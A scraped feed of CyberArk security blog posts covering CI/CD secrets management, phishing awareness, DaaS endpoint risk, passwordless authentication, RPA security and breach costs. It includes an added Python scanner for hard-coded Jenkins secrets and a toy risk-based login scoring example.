Most organizations already have established requirements for securing credentials with secrets management in traditional IT systems, such as automatically rotating, centrally storing and continuously monitoring credentials and secrets. However, to protect your software supply chain and secure the CI/CD pipeline, you also need to implement these secrets management best practices throughout the Jenkins pipeline, within DevOps tools and admin consoles, on developer workstations and in applications and scripts. The most effective strategy follows these steps:

  • Enforce the “least privilege principle” to limit secrets exposure. Apply role-based access control (RBAC) so the developer, tool, application, container, script or automation process only has access to the credentials it needs. This, for example, will help prevent untrusted parties from configuring jobs and help ensure valuable credentials, such as deployment tokens, are segregated by appropriate access restrictions or deployed from a second secure Jenkins server.
  • Remove all hard-coded secrets in code, DevOps tools, configuration files and scripts. It’s also important to never use default passwords. For example, some tools establish a default developer user to create projects; other tool consoles can be reached over plain HTTP or with the default password left in place.
  • Authenticate access to secrets. This extra layer of protection requires attackers to take extra steps beyond stealing a single secret known as “secret zero.”
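The second step above (removing hard-coded secrets from Jenkinsfiles, configuration files and scripts) is the one that can be checked mechanically in the pipeline itself. The following is an added example, not CyberArk’s or CloudBees’ code: a small Python check that flags hard-coded secrets in a constructed Jenkinsfile and passes the same pipeline rewritten to pull its secrets from the Jenkins credentials store. The credential ids `db-password` and `aws-deploy-key` are assumed names, and the two Jenkinsfiles are constructed for illustration.

```python
"""Flag hard-coded secrets in Jenkinsfiles, scripts and config files.

Added example (not CyberArk's or CloudBees' code). The two sample
Jenkinsfiles are constructed for illustration; the credential ids
'db-password' and 'aws-deploy-key' are assumed entries in the Jenkins
credentials store.
"""
import math
import re
import sys
from collections import Counter
from typing import List, NamedTuple


class Finding(NamedTuple):
    path: str
    line: int
    kind: str
    redacted: str  # the matched value with all but the first 4 characters masked


# Secret shapes worth flagging. The AWS access key id prefix, the GitHub
# token prefix and the PEM private-key header are documented public formats.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("github_token", re.compile(r"\bgh[pousr]_[0-9A-Za-z]{36,}\b")),
    ("private_key_block", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    # NAME = 'literal' or name: "literal" where NAME ends in a secret-like word
    ("assigned_secret", re.compile(
        r"(?i)\b\w*(?:password|passwd|pwd|secret|token|api[_-]?key)"
        r"\s*[:=]\s*['\"]([^'\"]{8,})['\"]")),
]

# Jenkins idioms that reference the credentials store instead of a literal.
SAFE_REFERENCE = re.compile(r"credentials\(|withCredentials\(|\$\{?[A-Z_]+\}?")


def shannon_entropy(s: str) -> float:
    """Bits per character; placeholders like 'xxxxxxxx' score very low."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    return value[:4] + "*" * (len(value) - 4) if len(value) > 4 else "****"


def scan_text(text: str, path: str = "<memory>") -> List[Finding]:
    """Return one Finding per (line, pattern) hit, with the value redacted."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.strip().startswith(("//", "#")):
            continue  # whole-line comments are skipped in this example
        for kind, pat in PATTERNS:
            m = pat.search(line)
            if not m:
                continue
            value = m.group(m.lastindex or 0)
            if kind == "assigned_secret":
                # A credentials() call or ${VAR} expansion is the safe pattern,
                # and an all-same-character placeholder is not a real secret.
                if SAFE_REFERENCE.search(value) or shannon_entropy(value) < 2.5:
                    continue
            findings.append(Finding(path, lineno, kind, redact(value)))
    return findings


def scan_file(path: str) -> List[Finding]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read(), path)


# Constructed sample: secrets pasted straight into the environment block.
VULNERABLE_JENKINSFILE = """\
pipeline {
    agent any
    environment {
        DB_PASSWORD = 'Sup3rS3cr3t-Db-Pa55w0rd'
        AWS_ACCESS_KEY_ID = 'AKIAEXAMPLEEXAMPLE01'
    }
    stages {
        stage('Deploy') {
            steps { sh 'aws s3 cp build/app.tgz s3://releases/' }
        }
    }
}
"""

# Constructed sample: the same pipeline reading from the credentials store
# (credentials() and withCredentials() are standard Jenkins pipeline steps).
HARDENED_JENKINSFILE = """\
pipeline {
    agent any
    environment {
        DB_PASSWORD = credentials('db-password')
    }
    stages {
        stage('Deploy') {
            steps {
                withCredentials([string(credentialsId: 'aws-deploy-key', variable: 'AWS_KEY')]) {
                    sh 'aws s3 cp build/app.tgz s3://releases/'
                }
            }
        }
    }
}
"""

if __name__ == "__main__":
    # With file paths as arguments this acts as a CI gate; otherwise it
    # demonstrates the two constructed samples.
    targets = sys.argv[1:]
    hits = [f for p in targets for f in scan_file(p)] if targets else (
        scan_text(VULNERABLE_JENKINSFILE, "Jenkinsfile.vulnerable")
        + scan_text(HARDENED_JENKINSFILE, "Jenkinsfile.hardened"))
    for f in hits:
        print(f"{f.path}:{f.line}: {f.kind}: {f.redacted}")
    sys.exit(1 if hits else 0)
```

Run with one or more file paths to use it as a pre-commit or pipeline gate; with no arguments it reports two findings for the vulnerable sample and none for the hardened one.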

A centralized secrets management platform will make these best practices far easier to implement and manage by giving your organization a complete and continuous picture of “who has access to what.”

Orchestrating Trust in the DevOps Pipeline: Where to Go from Here?

While the notion of “shift left” to build safer and more efficient CI/CD practices and processes is widely understood, putting it into practice can be difficult. It’s important for the security team to take the lead in integrating security into the DevOps processes before poor practices become entrenched. And instead of viewing security as the “release prevention department,” developers should make it a practice to bring security in at the planning stage — and keep security tightly integrated in the CI/CD process from end to end.

Here are four practical recommendations for making this collaborative approach a reality:

1. Security teams must get up to speed on DevOps tools and techniques to credibly communicate risk and best practices to their development counterparts. And by using agile and DevOps methods within their own security practices, such as automating security tasks and delivering security capabilities in smaller, more frequent increments, they can gain a deeper understanding of DevOps.

2. Implement a security team-owned solution that provides critical capabilities, such as secrets management, in machine-consumable ways that can be integrated into automated processes, like security policy as code. This makes it easier for developers to get the access they need to do their jobs, while doing the “right” thing from a security perspective.

3. Teams should jointly consider how best to deploy security resources into existing or new organizational models and structures, for example by establishing centers of excellence, community leaders and security champions, and by embedding security team members inside development teams. “Results from Gartner’s 2021 Enabling Cloud-Native DevSecOps survey showed that creating a cloud center of excellence (COE) was considered as the single most effective measure to improve security, with 31% of respondents naming it as their first choice.”[3]

4. Offer developer training on specific attacker tactics, show how sample code modules could expose secrets, and frame the examples as user stories. For example, “As an attacker, I would scan the organization’s code repositories looking for secrets.” Take the team through a penetration testing exercise or engage a Red Team to demonstrate how an attacker could compromise a CI/CD pipeline.

With the right tools and strategy in place, security teams can more effectively partner with developers to establish more agile, secure and productive dev environments downstream in your software supply chains.

[1] Gartner, “How Software Engineering Leaders Can Mitigate Software Supply Chain Security Risks,” 15 July 2021. Manjunath Bhat, Dale Gardner, Mark Horvath.

[2] Gartner, “How Software Engineering Leaders Can Mitigate Software Supply Chain Security Risks,” 15 July 2021. Manjunath Bhat, Dale Gardner, Mark Horvath.

[3] Gartner, “Survey Analysis: Enabling Cloud-Native DevSecOps,” 13 September 2021. Dionisio Zumerle.

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.

8 Ways to “Fight the Phish” this Cybersecurity Awareness Month https://www.cyberark.com/blog/8-ways-to-fight-the-phish-this-cybersecurity-awareness-month/ Wed, 13 Oct 2021 20:12:35 +0000

We’ve all been targeted in phishing attacks — fake messages from a seemingly trusted or reputable source designed to convince you to click on a malicious link, reveal information, give unauthorized access to a system or execute a financial transaction. During this second week of Cybersecurity Awareness Month, pay extra attention to those emails, text messages and chat boxes coming from a stranger or someone you weren’t expecting — and think before you click!

Many phishing attempts are easily recognizable, like Mark Zuckerberg contacting you personally about a prize you’ve won. If you’re ever in need of a laugh, this guy spent two years replying to phishing emails and then wrote an entire book on his hilarious exchanges with fraudsters.

At this point, phishing is widely accepted as a “given” — part of daily online life. However, attackers keep innovating, finding new ways to social engineer their victims by preying on their natural curiosity, trust and compassion for others. And today, there are plenty of phishing schemes that aren’t so obvious and can potentially dupe even the most cautious online user. For example, highly convincing COVID-19 scams, from Facebook messages from “friends” who’ve fallen on hard financial times to emails requesting proof of vaccination status, are rampant right now.

According to US-CERT, some of the most common — and seemingly legitimate — phishing emails include fake communications from online payment or internet service providers (claiming there is a “problem” with your account); false accusations from the FDIC of violating the Patriot Act (requesting that you “verify” your identity); and phony communications from your employer’s IT department (seeking passwords or other sensitive information that somebody can use to gain access to corporate systems and data).

Spot Phishing Attempts and Protect Your Digital Identity with These Simple Tips

The good news is that you can avoid most phishing and social engineering attempts altogether with a healthy dose of skepticism and common sense and by following these simple steps:

1. Choose your friends wisely. It’s solid advice in real life — and even more critical in the digital world. If you receive a LinkedIn message or Instagram friend request from someone you don’t know, do not respond, accept or click on any links within the message … which leads us to tip #2.

2. Don’t click on hyperlinks. Never click on a link from an unverified source. And remember, even emails sent from familiar sources can lead to issues: malware, ransomware and viruses can spread by scanning your device for other email addresses, then sending themselves to those email addresses in messages supposedly “sent” by you.

3. Urgent? Not so fast … Many phishing emails and messages attempt to create a sense of urgency, causing the recipient to fear their account or information is in jeopardy. Here’s a real-life example from the Federal Trade Commission: “Our records indicate that your account was overcharged. You must call us within 7 days to receive your refund.” If you receive a suspicious email that appears to be from someone you know, reach out to that person directly. If the email comes from an organization but still looks “phishy,” reach out to them via customer service to verify the communication.

4. Step away from that personality quiz — and think twice before you post that update. Sure, social media quizzes are a fun way to kill time (who doesn’t want to know their celebrity doppelganger?!), but they’re also an excellent way for attackers to get a hold of your personal details. While taking a seemingly harmless quiz, you may disclose things like your full name, birthday or employer. The same advice applies to your regular social media posts — think twice before you put too much out there. Cyber criminals can use all this personal information to take advantage of you. What’s more, you could be handing them the answers to your security and password recovery questions.

5. Turn off location sharing whenever possible. Attackers can use location-sharing information to craft phishing messages that seem very timely and relevant. For instance, your location is embedded as metadata in every picture you take with your phone. Turn location services off when you aren’t using them to make it more difficult for bad actors to view this information.

6. Protect your personal computers and mobile phones. US-CERT recommends installing antivirus software and personal firewalls on your personal devices and making sure they’re set for automatic updates. It’s also essential to keep business and personal use separate — especially if you’re working remotely: don’t use your corporate device out of convenience to browse the internet, online shop, scroll through social media or check personal email.

7. Take back control of your spam folder. While not every message that falls into your spam filter is a phishing email, many of them are. Take some time this month to clean up your spam (or set up filters to keep junk out of your inbox), browse this helpful list from CISA on reducing junk mail and say goodbye to those bogus business opportunities, chain letters and too-good-to-be-true diet scams.

8. Protect your online accounts with multifactor authentication (MFA). According to National Institute of Standards and Technology (NIST) guidance, the passwords and passphrases you use should be as long and complex as possible — and never used in more than one place. But if you think passwords alone will protect you, think again. Many digital accounts such as email, online banking and social media give you the option of enabling MFA to add an extra layer of protection to the sign-in process. MFA typically combines at least two of the following:

  • Something you know: a password, PIN or answer to a security question
  • Something you have: a mobile device
  • Something you are: a fingerprint or facial recognition

Combining these different types of identification can help to ensure you are who you say you are. Need more convincing? A study conducted by Google, New York University and University of California San Diego found that using MFA blocked 100% of automated bots, 99% of bulk phishing attacks and 66% of targeted attacks on users’ Google accounts. Reference CISA’s MFA tip sheet for more details.

To test your ability to spot a “phish,” check out these real-world examples of phishing emails, and some other helpful steps you can take if a phishing attack has targeted you. And come back soon for week three of Cybersecurity Awareness Month to explore stories from our team about why they chose cybersecurity as a career — and how collaboration is key to continued innovation.

Hybrid Work Brings DaaS and Endpoint Risks https://www.cyberark.com/blog/hybrid-work-brings-daas-and-endpoint-risks/ Thu, 07 Oct 2021 13:00:40 +0000

It happened so gradually that we almost didn’t notice it. The initial rush to establish remote work systems was fueled by frantic desperation and necessity. Businesses that never even considered having a remote workforce were thrown into the deep end to sink or swim. To facilitate flexible ways of working, many doubled down on Virtual Desktop Infrastructure (VDI), in-house hosted digital workstations that enable access to corporate assets and applications from remote devices and locations. Others chose to connect their workers via Desktop as a Service (DaaS), virtual desktop tools that are easily deployed and fully managed by third-party providers. But while the importance of securing physical endpoints like desktops, laptops and servers was top-of-mind during this time, these cloud-based virtual machines were, in fact, also endpoints that posed similar risks and broadened the attack surface substantially. Except many companies weren’t thinking of them like that.

After the initial adrenalin wore off, employers and employees eased into a kind of semi-comfort zone. Remote work was, well, working. But just as companies began to ponder when a return to a traditional office might be possible, their now thoroughly ensconced workforce was pondering why they’d ever want to go back. The idea of hybrid working schedules began to formulate, but the path forward was still not entirely clear. And while this tug of war is currently playing out in what is being called “The Great Resignation,” malicious actors are making the most of this perfect storm of device-hopping employees, decentralized IT services and new attack vectors.

While VDI and DaaS systems have been around for a while, they’re now seeing renewed relevance as the cornerstones of distributed work models, as they give users the ability to access their work desktops, applications and data from anywhere in the world, on any device. But despite their many benefits, they also provide new, more efficient ways for attackers and ransomware actors to ply their trade. The numbers would almost seem like parodies if they weren’t so chilling — for instance, Remote Desktop Protocol (RDP) attacks rose 241% in 2020, from 969 million to 3.3 billion. Like a wounded seal flopping in the ocean, the ripples of billions of new, often unsecured endpoints frantically popping up overnight were attracting sharks. If remote work is, indeed, here to stay (and it looks as if it is — an Accenture report found that 63% of high-revenue growth companies are using hybrid workforce models and that 83% of workers prefer hybrid), then there’s much work to be done to shore up security.

Consolidating Your Strategy to Secure Endpoints Everywhere

The truth is that even supremely vigilant organizations will face exposure through DaaS and VDI systems, due to the sheer number of new attack surfaces created by a remote workforce using a combination of company-provided and personal devices. What’s more, DaaS users are often IT admin users with higher levels of privileged access than a typical business user, which makes them high-value targets for attackers.

And while these services may be new to some organizations, they are already very familiar to malicious actors. Remote code execution (RCE) vulnerabilities can be easily exploited — one of the more infamous, BlueKeep, has plagued Windows operating systems since Windows 2000. The same flaws that allow unauthorized access to a single desktop operating system are now amplified through remote desktop environments, and attacks are proliferating as a result.

But the remedy isn’t that severe. In fact, it’s really what any company should be implementing regardless of where, when, or on what devices their employees choose to work: adopt one cohesive strategy for securing every endpoint. Because trying to juggle separate policies for remote and/or BYOD workers and in-office employees will undoubtedly lead to operational headaches and potentially dangerous security gaps.

A comprehensive endpoint strategy should center on an “assume breach” mentality. Accept that some attackers will slip through and set about limiting what they can do and where they can go once they’re inside. That way, remote desktop or not, your business’s most critical assets will be protected.

Building a Master-Level Maze, Not Walls

Unfortunately, the “firewall” concept persists. There is still that sense that locking doors and setting up walls will keep the bad guys out. Cybersecurity simply doesn’t work that way anymore. Think of it less like putting up a wall and more like building a multi-level maze that’s nearly impossible to get through. Attackers may find entrances, but once inside their paths are impeded and stairs are obfuscated to the point of rendering them mostly harmless to the truly valuable information and systems.

Consider these three pointers when building your own security labyrinth to confound attackers:

1: Extend strong endpoint protection to all VDI and DaaS instances  

Building your “maze” begins with the understanding that any identity within your organization — whether remote worker, IT admin, third-party vendor, device or application — can become privileged under certain conditions. Implementing controls that can intelligently limit access to just what a user identity needs helps protect privileged accounts from unauthorized access, but they have to be enforced consistently.

Focus on extending existing endpoint security controls to every DaaS or VDI instance, even if the end-user happens to be using a BYOD device, to minimize the risk of data theft or system disruption. As part of this, consider tools that can help DaaS administrators easily remove local admins from all DaaS instances to minimize the risk of ransomware and other endpoint attacks.

2: Keep watch for insider threats

One of the major concerns organizations have about remote and hybrid work is that they can’t physically keep an eye on their workforce and therefore their systems are less secure. While a recent study showed that 52% of employees do feel they can get away with riskier behavior when working from home, the truth is that sitting in an office isn’t necessarily any more secure, as insider threats are a constant.

Rather than looking for one security silver bullet (spoiler: none exist), layer preventive controls and detective mechanisms to help stop malicious insiders from accomplishing their goals. For example, privilege deception features can quickly detect and block lateral movement in the network or OS instance, minimizing the impact on the logged-in user and stopping the ripple effect across users sharing the same instance. Again, the goal is to architect something closer to a security ecosystem, rather than a series of flimsily locked gates.

3: Integrate endpoint security controls with MFA

When privileged access controls are integrated with multi-factor authentication (MFA) to enable secure VDI and DaaS instance logins, password-related risks drop substantially. “Step up” MFA can also help ensure safe and secure privileged access to applications — yet another way to build twists, turns and dead ends that can corral malicious agents and severely impede their plans to march through your system.

Not only does MFA coupled with endpoint privileged access controls minimize risk, but it also gives remote and hybrid employees increased flexibility in where and when they work — which is, of course, the point. When employees feel like they have more freedom and flexibility — and companies know every identity (human or application) is secure throughout the cycle of accessing critical assets — then hybrid, distributed work ceases to be a frantic necessity and becomes a viable professional reality.

Embracing distributed work doesn’t mean resigning your company to constant cybersecurity duress; it simply calls for a unified endpoint security strategy and a solid foundation of tools, technologies and policies. Cloud-based tools like VDI and DaaS can, and should, be tools for growth and don’t have to be a constant source of consternation or concern.

Shameless plug alert: By consistently enforcing least privilege, CyberArk Endpoint Manager can help your organization tackle these important steps, while still giving end-users the control they need to work efficiently.

Have three more minutes? Check out CyberArk Endpoint Privilege Manager in action as it removes local admin rights on a virtual workspace to reduce DaaS security risks. You’ll also see some privilege elevation examples for specific administrative tasks.

Rethinking Passwords this Cybersecurity Awareness Month https://www.cyberark.com/blog/rethinking-passwords-this-cybersecurity-awareness-month/ Mon, 04 Oct 2021 12:56:43 +0000

A new month is upon us, which means two things. First, your 30-day password may have just expired, and you’ll need to come up with a new one so you can get back on your company network. Before you change that last digit from “3” to “4” and move on, hear us out. Because second, October happens to be Cybersecurity Awareness Month — a month-long effort to raise awareness about the importance of strong cybersecurity practices — and the perfect time to rethink that password.

As digital citizens, we each have a responsibility to protect our corner of cyber space. And especially as the lines between work and home have long since blurred, how we prove we are who we say we are is an important part of that.

In most cases, we “verify” our identities with a password, whether it’s to check a bank account balance, shop online or access work-related applications and systems. But often, these passwords get used in multiple places (after all, you can’t forget your Netflix password if you use the same one to check your work email). But, of course, this is a big problem. Cyber criminals know these dirty little password secrets and target weak passwords as an easy way to steal information and even get rich quick.

Instead of just resetting that password in front of you, here are seven reasons why it may be time for your company to lose it altogether:

1. Most people are terrible at selecting strong passwords. Each of us has an average of 85 passwords between work and personal accounts, and honestly, who has the time to remember all that!? So when it comes time to reset an expiring password, most people simply replace one digit with another, completely negating the intended purpose of the mandatory reset (NIST advises against regular mandatory password resets for this very reason). And while most security teams go out of their way to recommend tips and tricks for complex and unique passwords, many employees fail to follow this advice. Even when people do follow best practices, risky habits like saving credentials in browsers, resorting to Excel sheets or post-it notes or re-using passwords at work and home are as common as you’d think.

2. Password and credential theft happen all the time. It’s easy for attackers to steal or crack credentials — so they keep doing it, using common methods like phishing and impersonation. There’s a whole body of research on the mathematics of password cracking, and the odds are definitely not in your favor. In fact, the 2021 Verizon Breach Investigations Report found that a whopping 80% of hacking-related breaches can be linked to stolen or brute-forced credentials.

3. Password issues are a productivity suck for you and your company’s IT help desk team. Every time you get locked out of an account or can’t access a work resource, you lose valuable time. You must call your IT help desk team, who likely has to reset the password or help you get the access you need to do your job. Our team made some simple calculations to come up with a dollar amount for the lost time spent resolving password issues: an enterprise of 1,000 employees spends about $495,000 annually. Instead of focusing on important business tasks, employee productivity plummets while IT help desk managers pull longer shifts to address access issues and deal with (understandably) frustrated end-users.

4. Password managers are only a first line of defense. Having dedicated password managers can be a helpful way to protect your personal passwords by eliminating the need to memorize credentials or store them in a browser. But they’re not foolproof, especially if you’re re-using the same passwords for home and work. They also don’t provide adequate coverage in corporate environments, where many different users need many different levels of system access. Password managers can’t manage who gets access to what sensitive resources and for how long. Meanwhile, IT teams have limited visibility into access-related events, creating security gaps and risk exposure.

5. Comfort and confidence in passwordless authentication methods are growing. Getting prompted repeatedly to reauthenticate your password gets old quickly. This “security fatigue” leads many people to look for ways of bypassing or ignoring authentication systems. It’s also why 86% of senior security executives say user experience optimization is “important” or “very important” when it comes to authentication. The good news is people are open to trying out new passwordless methods to protect both their personal accounts and their companies’ sensitive data. Specifically, the 2021 Experian Global Identity & Fraud Report found that consumers have an increasing level of comfort and preference for physical biometric authentication methods (e.g., facial recognition and fingerprints) as well as behavior-based authentication methods (e.g., passively observed signals that require no effort from the user).

6. Technology has come a long way. Innovations like machine learning are helping to minimize common password annoyances by eliminating excess login requests. Meanwhile, adaptive Single Sign-On (SSO) tools are helping employers overcome security challenges associated with traditional passwords and automate the manual access-granting processes that bog down IT help desk teams. With this approach, the SSO layer analyzes user and device context to determine whether an access request is “normal.” The system should know, for instance, if the user is attempting to access a database not usually accessed as part of their day-to-day activities, or if a device is in a different city than usual. If the context is abnormal, the system adapts its controls, for example by requesting reauthentication or adjusting the level of access granted. Analytics can minimize friction by putting up gates only when necessary, based on a risk score, and by remembering a successful step-up so the same device is not challenged again the next day.

7. Most people are ready to make a change. According to Ponemon Institute research, a majority of IT security practitioners and business users (55%) would prefer a method of account protection that doesn’t involve passwords. And lots of individuals and employers alike are getting on board: Microsoft data shows that 150 million people are already using passwordless logins each month.
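The risk-based gating described in point 6 (score the context, allow silently when it looks normal, step up or block when it does not, and learn from a successful step-up) is simple to express in code. The following is an added example written for this page, not CyberArk product code; the signals, weights, thresholds, the “ip_reputation” label and the user history are all assumed, constructed values.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# Thresholds and weights are assumed values chosen for this example, not a
# vendor's scoring model. Scores below ALLOW_BELOW get silent SSO, scores below
# STEP_UP_BELOW trigger reauthentication (MFA), anything higher is blocked.
ALLOW_BELOW = 25
STEP_UP_BELOW = 60
WEIGHTS = {
    "unknown device": 30,
    "new location": 25,
    "unusual resource": 25,
    "outside working hours": 10,
    "bad ip reputation": 40,
}


@dataclass
class Baseline:
    """What 'normal' looks like for one user, learned from past successful logins."""
    devices: set[str]
    cities: set[str]
    resources: set[str]
    work_hours: range = field(default_factory=lambda: range(7, 20))  # 07:00-19:59 local


@dataclass(frozen=True)
class AccessRequest:
    user: str
    device_id: str
    city: str
    resource: str
    hour: int            # local hour of day, 0-23
    ip_reputation: str   # label from an assumed threat-intel feed: "clean" or "suspicious"


def score_request(baseline: Baseline | None, req: AccessRequest) -> tuple[int, list[str]]:
    """Return a risk score plus the signals that produced it (for the audit trail)."""
    if baseline is None:
        # No history to compare against: never allow silently, always step up.
        return STEP_UP_BELOW - 1, ["no behavioural baseline for user"]
    score, reasons = 0, []
    checks = [
        ("unknown device", req.device_id not in baseline.devices),
        ("new location", req.city not in baseline.cities),
        ("unusual resource", req.resource not in baseline.resources),
        ("outside working hours", req.hour not in baseline.work_hours),
        ("bad ip reputation", req.ip_reputation != "clean"),
    ]
    for name, triggered in checks:
        if triggered:
            score += WEIGHTS[name]
            reasons.append(name)
    return score, reasons


def decide(score: int) -> str:
    if score < ALLOW_BELOW:
        return "allow"
    if score < STEP_UP_BELOW:
        return "step-up"
    return "block"


def evaluate(baselines: dict[str, Baseline], req: AccessRequest) -> dict:
    score, reasons = score_request(baselines.get(req.user), req)
    return {"user": req.user, "score": score, "decision": decide(score), "reasons": reasons}


def record_success(baselines: dict[str, Baseline], req: AccessRequest) -> None:
    """After a successful step-up, fold the new context into the baseline so the
    same device and location are not challenged again (the 'adaptive' part)."""
    b = baselines.setdefault(req.user, Baseline(set(), set(), set()))
    b.devices.add(req.device_id)
    b.cities.add(req.city)
    b.resources.add(req.resource)


def demo_baselines() -> dict[str, Baseline]:
    """Constructed history for one user; a real system derives this from login logs."""
    return {"alice": Baseline(devices={"laptop-a1"}, cities={"Boston"}, resources={"crm", "wiki"})}


if __name__ == "__main__":
    baselines = demo_baselines()
    requests = [  # constructed sample requests
        AccessRequest("alice", "laptop-a1", "Boston", "crm", 10, "clean"),          # routine
        AccessRequest("alice", "laptop-a1", "Boston", "hr-database", 14, "clean"),  # unusual resource
        AccessRequest("alice", "tablet-x9", "Lisbon", "crm", 3, "clean"),           # new device + city, 3am
        AccessRequest("mallory", "unknown", "Boston", "crm", 10, "clean"),          # no history at all
    ]
    for r in requests:
        print(evaluate(baselines, r))
    # Alice passes MFA on the new tablet; from now on it is a known device.
    record_success(baselines, requests[2])
    print(evaluate(baselines, requests[2]))
```

The reasons list matters as much as the score: it is what the help desk sees when a user asks why they were challenged, and what the SOC correlates when a block fires. In a production system the weights would be tuned against observed false-positive rates rather than hand-picked as they are here.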

To learn more about how passwordless authentication can help protect your own digital identity while helping your company secure critical assets and boost its bottom line, explore our infographic below. And check back soon for week two of Cybersecurity Awareness Month, when we’ll dig into some simple ways to “fight the phish.”

Retire Your Password Infographic

]]>
RPA: How to Securely Start and Scale in the Automation-First Era https://www.cyberark.com/blog/rpa-how-to-securely-start-and-scale-in-the-automation-first-era/ Thu, 30 Sep 2021 13:00:08 +0000 https://www.cyberark.com/?p=123436 RPA: How to Securely Start and Scale in the Automation-First Era

Robotic Process Automation (RPA) is one of the key technologies fueling digital transformation. Ranked by industry experts as one of the fastest-growing enterprise software categories, RPA is helping businesses and their employees achieve the efficiency, accuracy and speed needed to compete and thrive. By approaching RPA automation projects and cybersecurity hand in hand, organizations can deliver enhanced digital experiences safely and quickly to customers. 

The Next Technological Disruption in the Enterprise

Over the past few decades, technology innovations have shaped and reshaped our daily lives — in particular, the way we work. RPA is poised to be the next disruptive technology in a series that has revolutionized business as we know it. Let’s take a brief look at these six distinct technology eras:

1. The mainframe era enhanced computational and transactional capabilities for governments, large businesses and research organizations.

2. Personal computers (PC) brought the power of computers to the broader population and smaller businesses.

3. Graphical user interfaces (GUI) made computers more intuitive, enabling less computer-savvy individuals to use computers and extending usage further in business and society.

4. Then along came the internet, connecting this vast network of computer users together in new and exciting ways.

5. Mobile brought the power of the internet to our fingertips.

6. The cloud gave us new ways to store vast troves of data, driving a boom in artificial intelligence (AI) capabilities.

Today, with better process mapping, the advent of computer vision and the fast growth of AI, the automation-first era is here. And while the technology supporting automation isn’t necessarily new, how it’s being combined and used is what defines this new chapter.

By utilizing pragmatic AI to drive process automation and digitization, RPA can automate a wide range of knowledge work carried out in today’s digital environment with great speed and precision — while allowing humans to focus on higher-value (and often more rewarding) work. RPA systems range widely in scale and complexity, from simple website chat bots that can answer standard queries to deployments of thousands of bots that can automate credit card processing and fraud detection jobs.

Rethinking How We Work with RPA

Though digital transformation has been on the corporate agenda for some time, some organizations are struggling to make the most of their digital initiatives. RPA is helping many companies overcome these challenges, not only by automating manual processes and enabling users, but also by helping teams break through conventional thinking. For example, in the financial services industry, RPA bots are helping with everything from streamlining manual underwriting processes to reducing fraudulent activity through account monitoring to assisting with new customer onboarding. By adopting RPA technology — even if it’s one small-scale project to start — organizations can quickly begin to see how they can apply automation to other areas of the business to their advantage.

When considering how RPA may work best for your organization, first examine the work your team is doing to determine which tasks require human involvement — and which repetitive, manual tasks could be offloaded to robots, such as data entry, transaction processing, response triggering and communicating with other digital systems. It’s important to remember that RPA technologies are meant to enhance, not replace, the human workforce. By shifting time and energy away from such low-value, high-volume tasks, employees can focus on ideas, innovation and the best parts of the job that brought them to your organization in the first place.

There are two main types of RPA bots: attended bots that work under human supervision, helping workers do their jobs, and unattended bots that can run without human involvement.

Your organization’s evaluation of RPA needs should involve both a top-down approach (to identify and prioritize key areas for automation to maximize ROI) and a bottom-up approach (to empower workers with automation based on their individual needs).

Protecting RPA Initiatives with Identity Security  

As with all digital transformation projects, security must be a key consideration from the start of an RPA initiative.

RPA bots and automation processes often require high levels of privilege to do their jobs, from interacting directly with business applications to mimicking human behavior and mirroring human identity and access permissions across multiple systems. This provides attackers with yet another potential way to steal data and cause chaos — particularly the estimated one-third of all RPA deployments running unattended today. For example, if threat actors can get their hands on unsecured RPA admin and bot credentials, they could gain access to critical business systems and data.

By enforcing consistent, traceable Identity Security policies such as automatically rotating privileged credentials, establishing secure connections and placing time limits on access permissions — along with driving automation security awareness across the enterprise — organizations can mitigate the risk of credential-based attacks. The practical test is whether a bot's credential ever appears in its workflow definition, a config file or a script: if it does, it cannot be rotated without redeploying the bot, and anyone who can read the file holds the same privilege the bot does.

Moving Secure RPA Deployments Forward

As their titles suggest, automation engineers are focused on streamlining or eliminating as many manual processes as possible — and security is no exception. Perhaps the greatest benefit of an identity-centric approach to RPA security is that critical security tasks, such as credential management, can be automated to remove former roadblocks that could slow things down, achieve new levels of operational efficiency and safely scale RPA initiatives faster.

CyberArk’s integration with UiPath enables organizations to do just that: improve operational efficiency by automating security functions with out-of-the-box integrations.


Learn firsthand how CyberArk Secrets Manager Credential Providers can help your organization increase operational efficiency and improve the security of your UiPath RPA deployments. In this on-demand session from UiPath’s Forward IV conference, Brandon Traffanstedt, CyberArk Global Director of Solutions Engineering, joins UiPath’s SVP of Product Nic Surpatanu and Global Security and Compliance lead Kevin Mooney to discuss “End-to-End Management, Governance and Security for Your Entire Automation Program.” This session explores key considerations for deploying automations on-premises, in private or public clouds and in virtual machines, along with best practices for centrally managing, governing and securing your entire automation ecosystem.

 

]]>
Data Breach Costs and Cloud Security Implications: 2021 https://www.cyberark.com/blog/data-breach-costs-and-cloud-security-implications-2021/ Fri, 24 Sep 2021 13:00:01 +0000 https://www.cyberark.com/?p=123123 Data Breach Costs and Cloud Security Implications: 2021

A hybrid cloud makes a lot of sense for most modern businesses. By stacking all your IT “building blocks” — services and infrastructure hosted on-premises or in your private and public cloud environments — together into one architecture, you get the best of both worlds.

The benefits of a unified, hybrid cloud are many: flexibility to quickly scale technology projects up and down, agility to adopt new solutions quickly and cost-efficiency through resource optimization, to name a few. In fact, companies derive up to 2.5 times the value from hybrid cloud than from a single-cloud, single-vendor model, according to recent IBM research. But if your approach to cloud security isn’t equally cohesive, risks can escalate quickly across these huge, interconnected environments.

Since the start of the pandemic and rise in remote work, 60% of organizations have moved further into cloud-based activities. During this period of drastic operational shifts, the average cost of a data breach reached $4.24 million per incident — the highest recorded cost to date. We dug into IBM’s latest Cost of a Data Breach report to explore the security implications of this sustained push to the cloud. Here are five takeaways for organizations as they adopt hybrid cloud models to enable their business and deliver the digital experiences customers have come to expect:

1. Cloud breaches begin with compromised credentials

Unsurprisingly, the study found that stolen credentials were the most common root cause of breaches. Breaches stemming from compromised credentials also took the longest to detect: an average of 250 days.

